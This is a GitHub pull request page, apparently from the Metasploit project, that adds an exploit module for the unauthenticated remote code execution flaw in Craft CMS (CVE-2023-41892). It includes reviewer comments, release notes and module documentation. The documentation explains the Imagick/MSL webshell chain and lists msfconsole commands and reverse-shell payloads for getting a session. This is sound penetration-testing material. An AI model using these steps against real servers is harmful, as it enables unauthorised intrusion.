New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Craft CMS unauthenticed RCE [CVE-2023-41892] #18612
Craft CMS unauthenticed RCE [CVE-2023-41892] #18612
Conversation
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks @h00die-gr3y for updating this. I just left a few last comments and questions before it lands. I tested against CraftCMS version 4.4.14 and it works great.
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Outdated
Show resolved
Hide resolved
Thanks for updating this @h00die-gr3y ! Everything looks good to me now. I tested against CraftCMS version 4.4.14 and verified I got a session with all the targets. I'll go ahead and land it.
|
Release notesThis adds an exploit module that leverages a remote code execution vulnerability in CraftCMS versions between 4.0.0-RC1 and 4.4.14. This vulnerability is identified as CVE-2023-41892 and allows an unauthenticated attacker to execute arbitrary code remotely. |
This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in CraftCMS which is a popular content management system. CraftCMS versions between
4.0.0-RC1
-4.4.14
are affected by this vulnerability allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.The vulnerability occurs using a PHP object creation in the
\craft\controllers\ConditionsController
class which allows to run arbitrary PHP code by escalating the object creation calling some methods available in\GuzzleHttp\Psr7\FnStream
.Using this vulnerability in combination with
The Imagick Extension
andMSL
which stands forMagick Scripting Language
, a full RCE can be achieved.MSL
is a built-inImageMagick
language that facilitates the reading of images, performance of image processing tasks, and writing of results back to the filesystem. This can be leveraged to create a dummy image containing malicious PHP code using theImagick
constructor class delivering a webshell that can be accessed by the attacker, thereby executing the malicious PHP code and gaining access to the system.For more information, please check this article on attackerkb.com.
Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain access to the underlying operating system as the user that the web services are running as (typically
www-data
).Installation
To test this module, you will need a vulnerable
CraftCMS
application.This module has been tested on:
CraftCMS 4.4.14
running on MacOS Docker Desktop based on aDDEV
deployment.Installation steps to install CraftCMS on MacOS using Desktop Docker and DDEV
Install Docker Desktop on your MacOS distribution.
Install DDEV.
Install CraftCMS following these installation steps.
NOTE: After step 2
Scaffold the project from the official starter project
, open composer.json to edit the CraftCMS version and set it to4.4.14
or lower.Run
composer update
to downgrade theCraftCMS
version to a vulnerable version. See also these instructions.Continue with step 3 and after completion, you should be able to access your application using your site name (https://mysite.ddev.site)
To access your application from another host, you need to setup a tunnel otherwise you can only access it from the local machine. You can follow these instructions.
You are now ready to test the module.
Verification Steps
msfconsole
use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
set rhosts <ip-target>
set rport 443
set lhost <ip-attacker>
set target <0=php, 1=Unix Command, 2=Linux Dropper>
exploit
you should get a
shell
orMeterpreter
Options
WEBSHELL
You can use this option to set the filename of the webshell with extension
.php
, otherwise the name will be randomly generated.COMMAND
This option provides the user to choose the PHP underlying shell command function to be used for execution.
The choices are
system()
,passthru()
,shell_exec()
andexec()
and it defaults topassthru()
.This option is only available when the target selected is either Unix Command or Linux Dropper.
For the native PHP target, by default the
eval()
function will be used for native PHP code execution.Scenarios
CraftCMS 4.4.14 on MacOS PHP - php/meterpreter/reverse_tcp
CraftCMS 4.4.14 on MacOS Unix Command - cmd/unix/reverse_bash
CraftCMS 4.4.14 on MacOS Linux Dropper - linux/x64/meterpreter/reverse_tcp
Limitations
Part of the exploit is the MSL script creation triggered by the Imagick plugin module. These files are created in the directory set by the
upload_tmp_dir
setting in thephp.ini
file (default/tmp
). These files are automatically cleaned, but in case of any failure, do clean them manually otherwise the next exploit session will fail using an outdated MSL file. These files start withphp
and you can list them with the commandls php*
.